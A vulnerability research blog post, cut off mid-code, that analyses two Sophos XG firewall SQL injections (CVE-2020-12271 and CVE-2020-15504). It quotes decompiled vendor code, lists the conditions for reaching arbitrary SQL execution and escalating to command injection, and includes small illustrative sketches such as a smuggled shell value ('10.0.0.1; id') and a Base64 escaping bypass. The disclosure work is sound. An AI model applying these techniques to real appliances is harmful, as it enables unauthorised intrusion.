Sophos XG - A Tale of the Unfortunate Re-engineering of an N-Day and the Lucky Find of a 0-Day

This was originally posted on blogger here.

On April 25, 2020, Sophos published knowledge base article (KBA) 135412, which warned about a pre-authenticated SQL injection (SQLi) vulnerability affecting the XG Firewall product line. According to Sophos, this issue had been actively exploited since at least April 22, 2020. Shortly after the knowledge base article, a detailed analysis of the so-called Asnarök operation was published. Whilst the KBA focused solely on the SQLi, this write-up clearly indicated that the attackers had somehow extended this initial vector to achieve remote code execution (RCE).

The criticality of the vulnerability prompted us to immediately warn our clients of the issue. As usual we provided lists of exposed and affected systems. Of course we also started an investigation into the technical details of the vulnerability. Due to the nature of the affected devices and the prospect of RCE, this vulnerability sounded like a perfect candidate for a perimeter breach in upcoming red team assessments. However, as we will explain later, this vulnerability will most likely not be as useful for this task as we first assumed.

Our analysis not only resulted in a working RCE exploit for the disclosed vulnerability (CVE-2020-12271) but also led to the discovery of another SQLi, which could have been used to gain code execution (CVE-2020-15504). The criticality of this new vulnerability is similar to the one used in the Asnarök campaign: it is exploitable pre-authentication via either an exposed user portal or an exposed admin portal. Sophos reacted quickly to our bug report, issued hotfixes for the supported firmware versions and released new firmware versions for v17.5 and v18.0 (see also the Sophos Community Advisory).

I AM GROOT

The lab environment setup will not be covered in full detail since it is pretty straightforward to deploy a virtual XG firewall. Appropriate firmware ISOs can be obtained from the official download portal. What is notable is the fact that the firmware allows administrators direct root shell access via the serial interface, the TelnetConsole.jsp in the web interface or the SSH server. Thus, there was no need to escape from any restricted shells or to evade other protection measures in order to start the analysis.



Device Management -> Advanced Shell -> /bin/sh as root.

After getting familiar with the filesystem layout, exposed ports and running processes, we suddenly noticed a message in the XG control center informing us that a hotfix for the n-day vulnerability we were investigating had been applied automatically.

Control Center after the automatic installation of the hotfix (source).

Architecture

In order to understand the hotfix, it was necessary to delve deep into the underlying software architecture. As the published information indicated that the issue could be triggered via the web interface, we were especially interested in how incoming HTTP requests were processed by the appliance.



Both web interfaces (user and admin) are based on the same Java code served by a Jetty server behind an Apache server.

Jetty server on port 8009 serving /usr/share/webconsole.

Most interface interactions (like a login attempt) resulted in an HTTP POST request to the endpoint /webconsole/Controller. Such a request contained at least two parameters: mode and json. The former specified a number which was mapped internally to a function that should be invoked. The latter specified the arguments for this function call.
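To make the request shape more tangible, here is a minimal Python sketch of how such a body could be assembled. It assumes the two parameters travel as an ordinary form-encoded POST body; the helper name `build_controller_body` and the `username` field are purely illustrative, while mode 151 and `languageid` are taken from the servlet excerpt further down.

```python
import json
from urllib.parse import urlencode, parse_qs


def build_controller_body(mode, arguments):
    """Encode `mode` and `json` as a form-encoded request body (assumed format)."""
    return urlencode({"mode": mode, "json": json.dumps(arguments)})


# Hypothetical arguments; the real login request carries more fields.
body = build_controller_body(151, {"username": "admin", "languageid": 1})

# Decoding the body again shows the two parameters the servlet looks at.
decoded = parse_qs(body)
mode_value = decoded["mode"][0]
arguments = json.loads(decoded["json"][0])
print(mode_value, arguments)
```

The point of the sketch is only the split between a numeric function selector and a JSON blob of arguments, which is what the rest of the analysis relies on.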

Login request sent to /webconsole/Controller via XHR.

The corresponding Servlet checked if the requested function required authentication, performed some basic parameter validation (code was dependent on the called function) and transmitted a message to another component - CSC.

if (151 == eventBean.getMode()) {

try {

final PrintWriter writer3 = httpServletResponse.getWriter();

if (httpServletRequest.getParameter("json") != null) {

final JSONObject jsonObject5 = new JSONObject();

final CSCClient cscClient4 = new CSCClient();

final JSONObject jsonObject6 = new JSONObject(httpServletRequest.getParameter("json"));

final int int1 = jsonObject6.getInt("languageid");

final int generateAndSendAjaxEvent = cscClient4.generateAndSendAjaxEvent(httpServletRequest, httpServletResponse, eventBean, sqlReader);



This message followed a custom format and was sent via either UDP or TCP to port 299 on the local machine (the firewall). The message contained a JSON object which was similar but not identical to the json parameter provided in the initial HTTP request.

JSON object sent to CSC on port 299.



The CSC component (/usr/bin/csc) appeared to be written in C and consisted of multiple submodules (similar to a BusyBox binary). To our understanding, this binary is a service manager for the firewall, as it contained, started and controlled several other jobs. We encountered a similar architecture during our Fortinet research.

Multiple different processes spawned by the CSC binary.

CSC parsed the incoming JSON object and called the requested function with the provided parameters. These functions, however, were implemented in Perl and invoked via the Perl C language interface. To do so, the binary loaded and decrypted an XOR-encrypted file (cscconf.bin) which contained various config files and Perl packages.



Another essential part of the architecture was the set of PostgreSQL database instances, which were used simultaneously by the web interface, the CSC and the Perl logic.

The three PostgreSQL databases utilized by the appliance.

High level overview of the architecture.

Locating the Perl logic

As mentioned earlier, the Java component forwarded a modified version of the JSON parameter (found in the HTTP request) to the CSC binary. Therefore, we started by having a closer look at this file. A disassembler helped us to detect the different submodules, which were distributed across several internal functions, but did not reveal any logic related to the login request. We did, however, find plenty of imports related to the Perl C language interface. This led us to the assumption that the relevant logic was stored in external Perl files, even though an intensive search on the filesystem had not returned anything useful. It turned out that the missing Perl code and various configuration files were stored in the encrypted tar.gz file (_/conf/cscconf.bin), which was decrypted and extracted during the initialization of CSC. The reason why we previously could not locate the decrypted files was that they could only be found in a separate Linux namespace.



As can be seen in the screenshot below the binary created a mount point and called the unshare syscall with the flag parameter set to 0x20000. This constant translates to the CLONE_NEWNS flag, which disassociates the process from the initial mount namespace.

For those unfamiliar with Linux namespaces: in general, each process is associated with a namespace and can only see, and thus use, the resources associated with that namespace. By detaching itself from the initial mount namespace, the binary ensures that whatever it mounts after the unshare syscall, including the files extracted there, is not visible to processes in the initial namespace. Namespaces are a feature of the Linux kernel, and container solutions like Docker rely heavily on them.
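The mapping from the raw flag value to its symbolic name can be checked with a few lines of Python. This is only a lookup sketch: the constants are the namespace-related `CLONE_*` values from the kernel header `linux/sched.h`, and the helper name `decode_unshare_flags` is made up for illustration.

```python
# Namespace-related flag values as defined in <linux/sched.h>.
NAMESPACE_FLAGS = {
    0x00020000: "CLONE_NEWNS",      # mount namespace
    0x02000000: "CLONE_NEWCGROUP",  # cgroup namespace
    0x04000000: "CLONE_NEWUTS",     # hostname / domain name
    0x08000000: "CLONE_NEWIPC",     # System V IPC, POSIX message queues
    0x10000000: "CLONE_NEWUSER",    # user and group IDs
    0x20000000: "CLONE_NEWPID",     # process IDs
    0x40000000: "CLONE_NEWNET",     # network stack
}


def decode_unshare_flags(flags):
    """Return the names of all namespace flags set in `flags`."""
    return [name for bit, name in sorted(NAMESPACE_FLAGS.items()) if flags & bit]


print(decode_unshare_flags(0x20000))  # ['CLONE_NEWNS']
```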

Calling unshare, to detach from the initial namespace, before extracting the config.

Therefore, even within a root shell we were not able to access the extracted archive. Whilst multiple approaches exist to overcome this, the most appealing at that point was to simply patch the binary. This way, it was possible to copy the extracted config to a world-writable path. In hindsight, it would probably have been easier to just scp nsenter to the appliance.

Accessing the decrypted and extracted files by jumping into the namespace of the CSC binary.

From a handful of information to the N-Day (CVE-2020-12271)

The rolled out hotfix boiled down to the modification of one existing function (_send) and the introduction of two new functions (getPreAuthOperationList and addEventAndEntityInPayload) in the file /usr/share/webconsole/WEB-INF/classes/cyberoam/corporate/CSCClient.class.

The function getPreAuthOperationList defined all modes which can be called unauthenticated. The function addEventAndEntityInPayload checks whether the mode specified in the request is contained in this list (PRE_AUTH_OPERATIONS) and, if that is the case, removes the Entity and Event keys from the JSON object.

private static ArrayList<Integer> getPreAuthOperationList() {

ArrayList<Integer> modeList = new ArrayList<Integer>();

modeList.add(151);

modeList.add(1503);

[...]

return modeList;

}

private void addEventAndEntityInPayload(HttpServletRequest req, JSONObject reqJson, int mode) {

try {

if (PRE_AUTH_OPERATIONS.contains(mode)) {

[...]

reqJson.remove("Event");

reqJson.remove("Entity");

CyberoamLogger.debug((String)"CSC", (String)("Request payload after sanitization: " + reqJson.toString()));

}

[...]

}

}
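The effect of the hotfix can be modelled in a few lines of Python. This is a simplified sketch, not the vendor code: the set only contains the two modes visible in the excerpt, the elided parts of the Java method are ignored, and leaving payloads of other modes untouched is an assumption.

```python
import copy

# Only the modes visible in the excerpt; the real list is longer.
PRE_AUTH_OPERATIONS = {151, 1503}


def sanitize_payload(req_json, mode):
    """Drop Event and Entity from payloads of modes callable without a session."""
    cleaned = copy.deepcopy(req_json)
    if mode in PRE_AUTH_OPERATIONS:
        cleaned.pop("Event", None)
        cleaned.pop("Entity", None)
    return cleaned


payload = {"Event": "DELETE", "Entity": "example", "languageid": 1}
print(sanitize_payload(payload, 151))   # Event and Entity are gone
print(sanitize_payload(payload, 9999))  # unchanged in this sketch
```

Seen this way, the fix does not touch the vulnerable code itself. It only prevents unauthenticated requests from carrying the two keys that steer them into it, which is the hint the following analysis builds on.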

Analysis

Based on the hotfix we assumed that the vulnerability must reside within one of the functions specified in the getPreAuthOperationList. However, after browsing through the relevant Perl code in order to find blocks that made use of the Entity or Event key, we were pretty confident that this was not the case.

What we did notice, though, was that regardless of which mode we specified, every request was processed by the apiInterface function. Sophos denoted the functions mapped to the mode parameter internally as opcodes.

opcode apiInterface{

CALL validateRequestType

CALL variableInitialization

[...]

CALL isAPIVersionSupported

CALL opcodePreProcess

FOR ("$ind=0";"$ind<scalar(@reqEntitiesArr)";"$ind++") {

$currRequest=$reqEntitiesArr[$ind];

if($requestType eq $REQUEST_TYPE{MULTIREQUEST}){

print "\n\n\t ============ Handling request -- Entity = $currRequest->{Entity}";

$request=$currRequest->{reqJSON};

$request->{Event}=uc($currRequest->{Event});

$request->{Entity}=lc($currRequest->{Entity});

}

CALL checkUserPermission

CALL preMigration

CALL createModeJSON

CALL migrateToCurrVersion

CALL createJson

CALL validateJson

CALL handleDeleteRequest

CALL replyIfErrorAtValidation

CALL getOldObject

IF("$entityJson->{Event} eq 'DELETE' && defined $modeJson->{ORM} && $modeJson->{ORM} eq 'true'"){

CALL executeDeleteQuery

}

}

[...]

The apiInterface function was also the place where we finally found the SQLi vulnerability, or rather the execution of arbitrary SQL statements. As depicted in the source excerpt below, this opcode called the executeDeleteQuery function (in the last IF block of the loop shown above), which took SQL statements from the query parameter and ran them against the database.

FUNCTION executeDeleteQuery{

@queryToExecute=@{$request->{query}};

FOR("$q=0";"$q<scalar(@queryToExecute)";"$q++") {

QUERY "$queryToExecute[$q]"

}

ON_FAIL{

QUERY "rollback"

%responsej=("status"=>"500","statusmessage"=>"Records Deletion Failed.","deleteObjects"=>\@deletingObjects,"references"=>$references);

REPLY %responsej 500

}

}

Unfortunately, in order to reach the vulnerable code, our payload needed to pass every preceding CALL statement which enforced various conditions and properties on our JSON object.

The first call (validateRequestType) required that Entity was not set to securitypolicy and that the request type was ORM after the call.

FUNCTION validateRequestType{

IF("defined $request->{Entity} && defined $request->{Event}"){

IF("$request->{Entity} eq '' || $request->{Event} eq ''"){

Log applog "\n\n Error ----> Entity and Event is defined but NULL value is passed...! !\n"

FAIL

}

[...]

IF("$request->{Entity} eq 'securitypolicy' && $request->{Event} eq 'DELETE' && scalar(@{$request->{name}}) > 1"){

[...]

}

}ELSE IF("defined $request->{reqEntities}"){

IF("scalar(@{$request->{reqEntities}}) == 0"){

FAIL

}

[...]

The next call (variableInitialization) initialized the Perl environment and should always succeed. To keep our request simple and to avoid additional requirements, the Entity value in our payload should not be one of the following: securityprofile, mtadataprotectionpolicy, dataprotectionpolicy, firewallgroup, securitypolicy, formtemplate or authprofile. This allowed us to skip the checks performed in the function opcodePreProcess.

The checkUserPermission function does what its name suggests. However, the function body shown below is only executed if the JSON object passed to Perl includes a ___username parameter. This parameter was added by the Java component before the request was forwarded to the CSC binary, provided that the HTTP request was associated with a valid user session. Since we used an unauthenticated mode in our payload, the ___username parameter was not set, and we could ignore the respective code.

FUNCTION checkUserPermission{

IF("defined $request->{___username} && '' ne $request->{___username} && 'LOCAL' ne $request->{___username}"){

IF("(! defined $request->{currentlyloggedinuserid}) || '0' eq $request->{currentlyloggedinuserid} "){

curLogOut = QUERY "select userid from tbluser where username= '$currentUser'"

IF(" defined $curLogOut->{output}->{userid} && $curLogOut->{output}->{userid}[0] ne ''"){

[...]

To skip over the preMigration call we just had to choose a mode other than 35 (cancel_firmware_upload), 36 (multicast_sroutes_disable) or 1101 (unknown). On top of that, all three modes required authentication, making them unusable for our purposes anyway.

Depending on the request type, the function createModeJSON employed different logic to load the Perl module connected to the specified entity. Since each POST request initially started as an ORM request, we needed to be careful that the request type was not changed to something else. This was required to satisfy the last IF statement before the vulnerable function was called inside the apiInterface function. Therefore, the innermost if condition, which tests $modeJson->{ORM}, must not be satisfied. The respective code checked whether the ORM property specified in the loaded Perl module was set to true. We leave the identification of such an Entity as an exercise to the interested reader.

FUNCTION createModeJSON {

IF("$requestType == $REQUEST_TYPE{NORMALREQUEST}"){

$modeJson = getHashFromMode($request->{mode});

$packName=$modeJson->{entityFilename};

require $apiPath.$modeJson->{entityFilename};

}ELSE IF("$requestType == $REQUEST_TYPE{ORMREQUEST} || $requestType == $REQUEST_TYPE{MULTIREQUEST}"){

if(defined $request->{Entity}){

$packName=$ENTITYMAP->{$request->{Entity}};

print "\n\n package Name=$packName";

eval "use $packName";

$propertyObj="\$$packName"."::EventProperties";

$objecto=eval $propertyObj;

$modeJson = $objecto->{$request->{Event}};

$modeJson->{entityFilename}=$packName;

if((defined $modeJson->{ORM} && $modeJson->{ORM} ne 'true') || (!defined $modeJson->{ORM})){

$requestType = $REQUEST_TYPE{NORMALREQUEST};

$modeJson = getHashFromMode($request->{mode});

require $apiPath.$modeJson->{entityFilename};

}

}

}

}

We skipped the call to the migrateToCurrVersion function since it was not important for our chain. The next call to createJson verified if the previously loaded Perl package could actually be initialized and would always work as long as it referred to an existing Entity.

FUNCTION createJson{

IF("$modeJson->{entityFilename} eq \"\""){

<code>

$entityJson=$request;

print "\n\n MODE:$request->{mode} FILE NOT FOUND\n";

</code>

}ELSE{

<code>

$Package=$modeJson->{entityFilename};

print "\n PAckage ::::$Package";

eval "require $Package";

$entityJson=new $Package($request);

if(!$entityJson->can('new')){

print "\n\n PACKAGE:$Package NOT Found OBJECT NOT CREA TED\n";

}

</code>

}

}

The function handleDeleteRequest once again verified that the request type was ORM. After removing duplicate keys from our JSON, it ensured that our JSON payload contained a name key. The code then looped through all values which were specified in our name property and searched for foreign references in other database tables in order to delete these. Since we did not want to delete any existing data we simply set the name to a non-existing value.

We skipped the last two function calls to replyIfErrorAtValidation and getOldObject because they were not relevant to our chain and we had already walked through enough Perl code.

What did we learn so far?

- We needed a mode which could be called from an unauthenticated perspective.

- We had to avoid certain Entities.

- Our request needed to be of type $REQUEST_TYPE{ORMREQUEST}.

- The request had to contain a name property which held some garbage value.

- The EventProperties of the loaded Entity, and in particular the DELETE property, had to set the ORM value to true.

- Our JSON object had to contain a query key which held the actual SQL statement we wanted to execute.

Once we satisfied all of the above conditions, we were able to execute arbitrary SQL statements. There was only one caveat: we could not use any quotes in our SQL statements since the csc binary properly escaped those (see the escapeRequest sub in the 0-day chapter for details). As a workaround, we defined strings with the help of the concat and chr SQL functions.
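The quote-free workaround is easy to illustrate. The following Python sketch turns a string into an expression built from the PostgreSQL functions `concat` and `chr`, so that the resulting SQL text contains no quote characters. The helper name `quote_free_literal` is hypothetical, and the exact expressions used during the research are not known to us from the text above.

```python
def quote_free_literal(text):
    """Return a SQL expression that evaluates to `text` without using quotes."""
    if not text:
        raise ValueError("an empty string needs a different expression")
    parts = ", ".join("chr({})".format(ord(ch)) for ch in text)
    return "concat({})".format(parts)


expression = quote_free_literal("ab")
print(expression)  # concat(chr(97), chr(98))
```

Because the expression consists only of letters, digits, parentheses and commas, it passes through an escaping routine that targets quotes and backslashes unchanged.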

From SQLi to RCE

Once we had gained the ability to modify the database to our needs, there were quite a few places where the SQLi could be expanded into an RCE. This was the case because, in multiple instances, parameters stored in the database were passed to exec calls without sanitization. Here we will only focus on the attack path which was, based on our understanding and the details released in Sophos’ analysis, used during the Asnarök campaign.

According to the published information, the attackers injected their payloads in the hostname field of the Sophos Firewall Manager (SFM) to achieve code execution. SFM is a separate appliance to centrally manage multiple appliances. This raised the question: what happens in the back end if you enable the central administration?

To locate the database values related to the SFM functionality we dumped the database, enabled SFM in the front end, and created another dump. A diff of the dumps was then used to identify the changed values. This approach revealed the modification of multiple database rows. The attribute CCCAdminIP in the table tblclientservices was the one used by the attackers to inject their payload. A simple grep for CCCAdminIP directed us to the function get_SOA in the Perl code.

opcode get_SOA;

opcode get_SOA with attributes no_wait {

is_eula = NOFAIL EXECSH "/bin/nvram qget is_eula"

IF ("$is_eula->{status} eq '0'") {

TIMER get_SOA:add oncejob nosync "minutes 30" : opcode get_SOA

RETURN 200

}

[...]

#check if hotfixes are automatically installed

accepthotfixes = QUERY "select value from tblconfiguration where key='accepthotfixes'"

IF("$accepthotfixes->{output}->{value}[0] eq 'on'"){

[...]

# Our payload was inserted into CCCAdminIP and is here received from the database

out = QUERY "select servicevalue from tblclientservices where servicekey in ('CCCEnabled','CCCAdminIP','CCC_signature_distribution','CCCFWVersion') order by servicekey='CCCEnabled' desc,servicekey='CCCAdminIP' desc,servicekey='CCC_signature_distribution' desc,servicekey='CCCFWVersion' desc"

$CCCEnabled = $out->{output}->{servicevalue}[0];

$CCCAdminIP = $out->{output}->{servicevalue}[1];

$CCC_signature_distribution = $out->{output}->{servicevalue}[2];

$CCCFWVersion = $out->{output}->{servicevalue}[3];

[...]

out = EXECSH "echo $CCC_signature_port,$CCCAdminIP > /tmp/up2date_servers_srv.conf"

As can be seen in the excerpt, the code retrieves the value of CCCAdminIP from the database and passes it unfiltered into the final EXECSH call. Because the get_SOA opcode is executed regularly (apparently by some kind of scheduled job), our payload is executed automatically.
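Why the unfiltered value is a problem becomes obvious once the shell command is treated as a plain string. The Python sketch below mirrors the interpolation from the excerpt and contrasts it with a quoted variant. The port value, the harmless stand-in payload and the use of `shlex.quote` as a mitigation are assumptions for illustration; they do not describe how Sophos fixed the issue. No command is executed here.

```python
import shlex


def build_command(port, admin_ip):
    # Mirrors the string interpolation in the excerpt: no quoting at all.
    return "echo {},{} > /tmp/up2date_servers_srv.conf".format(port, admin_ip)


def build_command_quoted(port, admin_ip):
    # One possible mitigation: hand the value to the shell as a single word.
    return "echo {} > /tmp/up2date_servers_srv.conf".format(
        shlex.quote(port + "," + admin_ip)
    )


value = "10.0.0.1; id"  # harmless stand-in for a database-controlled value
unsafe = build_command("443", value)
safe = build_command_quoted("443", value)
print(unsafe)  # the ';' ends the echo command and starts a second one
print(safe)    # the whole value stays a single argument to echo
```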

What made this particular attack chain very unfortunate was the IF condition that checks accepthotfixes, as it allowed us to reach the EXECSH call only if the automatic installation of hotfixes was active (which is the default setting) and if the appliance was configured to use SFM for central management (which is not the default setting). As a result, the attackers most likely only gained code execution on devices with activated auto-updates, which led to a race condition between the hotfix installation and the moment of exploitation.

Installations that do not have automatic hotfixes enabled or have not moved to the latest supported maintenance releases could still be vulnerable.

Gaining code execution via the SQLi described in CVE-2020-12271.

From N to Zero (CVE-2020-15504)

Another promising approach for discovery of the n-day, instead of starting at a patch diff, seemed to be an analysis of all back end functions (callable via the /webconsole/Controller endpoint) which did not require authentication. The respective function numbers could, for example, be extracted from the Java function getPreAuthOperationList.

private static ArrayList<Integer> getPreAuthOperationList() {

final ArrayList<Integer> modeList = new ArrayList<Integer>();

modeList.add(151);

modeList.add(1503);

modeList.add(6000);

[...]

return modeList;

}

SQL-Injection countermeasures inside the Perl logic

Despite the fact that the back end performed all its SQL operations without prepared statements, these were not automatically susceptible to injection.

OPCODE login {

[...]

result = QUERY "select usertype from tbluser where username=lower('$request->{username}') and usertype = $CYBEROAMDEFAULTADMIN"

IF("defined $result->{output}->{usertype}[0]") {

[...]

The reason for this was that all function parameters coming in via port 299 were automatically escaped via the escapeRequest function before being processed.

sub escapeRequest{

my $class=shift;

my $request=shift;

foreach my $key ( keys % {$request}){

if(ref($request->{$key}) eq 'ARRAY'){

[...]

}elsif(ref($request->{$key}) eq 'HASH'){

[...]

}else{

if($request->{$key} ne ''){

$request->{$key}=~ s/\\\'/\'/g;

$request->{$key}=~ s/\\\\/\\/g;

$request->{$key}=~ s/\t/\\t/g;

$request->{$key}=~ s/\\/\\\\/g;

$request->{$key}=~ s/\'/\\\'/g;

}

}

}

return $request;

}
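For readers who do not speak Perl regex, the scalar branch of escapeRequest can be ported to Python almost line by line. This is a sketch of the five substitutions only; the elided ARRAY and HASH branches are not covered, and the function name `escape_scalar` is ours.

```python
def escape_scalar(value):
    """Python port of the scalar branch of escapeRequest (same order of steps)."""
    if value == "":
        return value
    value = value.replace("\\'", "'")     # s/\\\'/\'/g : undo an existing \'
    value = value.replace("\\\\", "\\")   # s/\\\\/\\/g : undo an existing \\
    value = value.replace("\t", "\\t")    # s/\t/\\t/g  : tab becomes backslash + t
    value = value.replace("\\", "\\\\")   # s/\\/\\\\/g : double every backslash
    value = value.replace("'", "\\'")     # s/\'/\\\'/g : escape single quotes
    return value


print(escape_scalar("a'b"))  # a\'b
```

The first two steps normalize input that is already escaped, so that applying the routine twice does not escape the value twice.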

So everything is safe?

One function which caught our attention was RELEASEQUARANTINEMAILFROMMAIL (NR 2531) as the corresponding logic silently bypassed the automatic escaping. This happened because the function treated one of the user-controllable parameters as a Base64 string and used this parameter, decoded, inside a SQL statement. As the global escaping took place before the function was actually called, it only ever saw the encoded string and thus missed any included special characters such as single quotes.
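The bypass follows directly from the Base64 alphabet, which contains neither quotes nor backslashes. The Python sketch below uses a reduced stand-in for the global escaping (backslashes and single quotes only) and an illustrative parameter value; the real format of the release parameter is more involved.

```python
import base64


def escape_scalar(value):
    # Reduced stand-in for the global escaping: backslashes and single quotes.
    return value.replace("\\", "\\\\").replace("'", "\\'")


raw = "hdnFilePath=O'Brien"  # illustrative value containing a single quote
encoded = base64.b64encode(raw.encode()).decode()

# The escaping only ever sees Base64 text and therefore changes nothing.
escaped = escape_scalar(encoded)
assert escaped == encoded

# Decoding afterwards brings the unescaped quote back.
decoded = base64.b64decode(escaped).decode()
print(decoded)
```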

After the parameter was decoded, it was split into different variables. This was done by parsing the string based on the key=value syntax used in HTTP requests. We were concentrating on the hdnFilePath variable, as its value did not need to satisfy any complicated conditions and ended up in the SQL statement later on.

OPCODE mergequarantine_manage{

IF("defined $request->{release} and $request->{release} ne '' "){

use MIME::Base64;

$param = decode_base64($request->{release});

[...]

# Code White: rcptData[1] is derived from $param

@filePathData = split(/&hdnDestDomain=/, $rcptData[1]);

$requestData{hdnFilePath}=$filePathData[0];

my $email_regex='^([\.]?[_\-\!\#\{\}\$\%\^\&\*\+\=\|\?\'\\\\\\/a-zA-Z0-9])*@([a-zA-Z0-9]([-]?[a-zA-Z0-9]+)*\.)+([a-zA-Z0-9]{0,24})$';

if($requestData{hdnRecipient} =~ /$email_regex/ && ((defined $requestData{hdnSender} && $requestData{hdnSender} eq '') || $requestData{hdnSender} =~ /$email_regex/) && index($requestData{hdnFilePath},'../') == -1){

$validate_email="true";

}

IF("$validate_email eq 'false'"){

<code>%response=("status"=>"548","statusmessage"=>"Invalid URL");</code>

REPLY %response 500

}



$iviewQuery= "select messageid,reason,isavas from (select messageid,COALESCE(NULLIF('',''),NULL) as reason,'as' as isavas from tblquarantinespammailmerge where quarantinearea='$requestData{hdnFilePath}' and recipient='$requestData{hdnRecipient}' UNION ALL select messageid,COALESCE(NULLIF('',''),NULL) as reason ,'as' as isavas from tblquarantinespammailmergev5 where quarantinearea='$requestData{hdnFilePath}' and recipient='$requestData{hdnRecipient}' UNION ALL select messageid,reason::text ,'as' as isavas from tblquarantinespammailmergev6 where quarantinearea='$requestData{hdnFilePath}' and recipient='$requestData{hdnRecipient}' UNION ALL select messageid,'' as reason ,'av' as isavas from tblquarantinemailmerge where quarantinearea='$requestData{hdnFilePath}' and recipient='$requestData{hdnRecipient}' UNION ALL select messageid,'' as reason ,'av' as isavas from tblquarantinemailmergev5 where quarantinearea='$requestData{hdnFilePath}' and recipient='$requestData{hdnRecipient}' UNION ALL select messageid,reason::text ,'av' as isavas from tblquarantinemailmergev6 where quarantinearea='$requestData{hdnFilePath}' and recipient='$requestData{hdnRecipient}' ) as tbl";

[...]

quarantinQuery = DLOPEN(iviewdb_query,iviewQuery)

}

}

The only constraint for $requestData{hdnFilePath} was that it did not contain the sequence ../ (which was irrelevant for our purposes anyway). After crafting a release parameter in the appropriate format, we were able to trigger a SQLi in the above SELECT statement. We had to be careful not to break the syntax, taking into account that the manipulated parameter was inserted six times into the query.
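The sixfold insertion is easiest to see with a reduced version of the statement. The Python sketch below keeps the six table names from the excerpt but selects only one column per branch; the helper name `build_query` and the marker value are hypothetical.

```python
TABLES = [
    "tblquarantinespammailmerge",
    "tblquarantinespammailmergev5",
    "tblquarantinespammailmergev6",
    "tblquarantinemailmerge",
    "tblquarantinemailmergev5",
    "tblquarantinemailmergev6",
]


def build_query(file_path, recipient):
    # Simplified: the real statement selects more columns per branch.
    branches = [
        "select messageid from {} where quarantinearea='{}' and recipient='{}'".format(
            table, file_path, recipient
        )
        for table in TABLES
    ]
    return " UNION ALL ".join(branches)


occurrences = build_query("MARKER", "user@example.com").count("MARKER")
print(occurrences)  # 6
```

Whatever ends up in hdnFilePath therefore has to leave each of the six branches syntactically valid, and any side effect it carries is triggered once per branch.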

Triggering a database sleep through the discovered SQLi (6s delay as the sleep command was injected 6 times).

Upgrading the boring Select statement

The ability to trigger a sleep enables an attacker to use well known blind SQLi techniques to read out arbitrary database values. The underlying Postgres instance (iviewdb) differed from the one targeted in the n-day. As this database did not seem to store any values useful for further attacks, another approach was chosen.

With the code-execution technique used by Asnarök in mind, we aimed for the execution of an INSERT operation alongside a SELECT. In theory, this should be easily achievable by using stacked queries. After some experimentation, we were able to confirm that stacked queries were supported by the deployed Postgres version and the used database API. Yet, it was impossible to get it to work through the SQLi. After some frustration, we found out that the function iviewdb_query (/lib/libcscaid.so) called the escape_string (/usr/bin/csc) function before submitting the query. As this function escaped all semicolons in the SQL statement, the use of stacked queries was made impossible.

Giving up yet?

At this point, we were able to trigger an unauthenticated SQL Injection in a SELECT statement in the iviewdb database, which did not provide us with any meaningful starting points for an escalation to RCE. Not wanting to abandon the goal of achieving code execution we brainstormed for other approaches. Eventually we came up with the following idea - what if we modified our payload in such a way that the SQL statement returned values in the expected form? Could this allow us to trigger the subsequent Perl logic and eventually reach a point where a code execution took place? Constructing a payload which enabled us to return arbitrary values in the queried columns took some attempts but succeeded in the end.

Execution of a SELECT statement which returns values specified inside the payload.

After we had managed to construct such a payload, we concentrated on the subsequent Perl logic. Looking at the source, we found a promising EXEC call just after the database query, and one of the parameters for that call was derived from a variable under user control.

quarantinQuery = DLOPEN(iviewdb_query,iviewQuery)

GET g_ha_mode

IF("!defined $quarantinQuery->{output}->{messageid} || $quarantinQuery->{output}->{messageid}[0] eq ''"){

IF ("$g_ha_mode == $HA_ENABLED") {

GET g_ha_ownstatus

IF ("$g_ha_ownstatus == $HA_PRIM"){

result = QUERY "select peerdedicatedip from tblhaparam"

<code>$peerdedicatedip=$result->{output}->{peerdedicatedip}[0];</code>

<code>

$jsonbody = "{\\\"hdnRecipient\\\":\\\"$requestData{hdnRecipient}\\\",\\\"hdnFilePath\\\":\\\"$requestData{hdnFilePath}\\\"}";

</code>

out = EXEC /bin/dbclient -n -I "60" -y -l hauser $peerdedicatedip /bin/opcode check_mail_availability_HA -t "json" -b $jsonbody -s nosync

Unfortunately, the variable $g_ha_mode (most likely related to the high availability feature) was set to false in the default configuration. This prompted us to look for a better way. The function mergequarantine_manage did not contain any further exec calls but triggered two other Perl functions in the same file, under the right conditions. Those functions were triggered via the apiInterface opcode which generated a new CSC request on port 299.

for($qurcnt=0;$qurcnt<scalar(@messageid);$qurcnt++){

if($isavasArr[$qurcnt] eq 'av' && $request->{action} ne 'release' && ($reasonarr[$qurcnt] ne '12' || $reasonarr[$qurcnt] eq '12')){

push(@avmessageidArr,$messageid[$qurcnt]);

push(@avrecipientArr,$rcptArr[$qurcnt]);

}elsif($isavasArr[$qurcnt] eq 'as' || ($isavasArr[$qurcnt] eq 'av' && $request->{action} eq 'release' && $reasonarr[$qurcnt] eq '12')){

push(@asmessageidArr,$messageid[$qurcnt]);

push(@asrecipientArr,$rcptArr[$qurcnt]);

}

}

# Code White: 831 == manage_quarantine

%spamqueReq=("mode"=>"831","hdnMessageid"=>\@asmessageidArr,"hdnRecipient"=>\@asrecipientArr,"action"=>"$request->{action}","reason"=>\@reasonarr);

# Code White: 833 == manage_malware_quarantine

%malwareReq=("mode"=>"833","messageid"=>\@avmessageidArr,"recipient"=>\@avrecipientArr,"action"=>"$request->{action}");

In our case $request->{action} was always set to release restricting us to a call to manage_quarantine. This function used its submitted parameters (result-set from the query in mergequarantine_manage) to trigger another SELECT statement. When this statement returned matching values an EXEC call was triggered, which got one of the returned values as a parameter.
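The routing decision made by the loop above can be restated in Python to see why only manage_quarantine was reachable. This is a reduced sketch that tracks message IDs only (the original also collects recipients), and the function name `route` and the sample rows are made up.

```python
def route(rows, action):
    """rows: (messageid, isavas, reason) tuples as returned by the first query."""
    av_ids, as_ids = [], []
    for messageid, isavas, reason in rows:
        if isavas == "av" and action != "release":
            # The original also tests (reason ne '12' || reason eq '12'),
            # which holds for every value.
            av_ids.append(messageid)
        elif isavas == "as" or (
            isavas == "av" and action == "release" and reason == "12"
        ):
            as_ids.append(messageid)
    return av_ids, as_ids


rows = [("m1", "as", ""), ("m2", "av", "12"), ("m3", "av", "5")]
print(route(rows, "release"))     # ([], ['m1', 'm2'])
print(route(rows, "quarantine"))  # (['m2', 'm3'], ['m1'])
```

With action fixed to release, the first list always stays empty, so only the request for mode 831 carries any message IDs.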

OPCODE manage_quarantine{

[...]

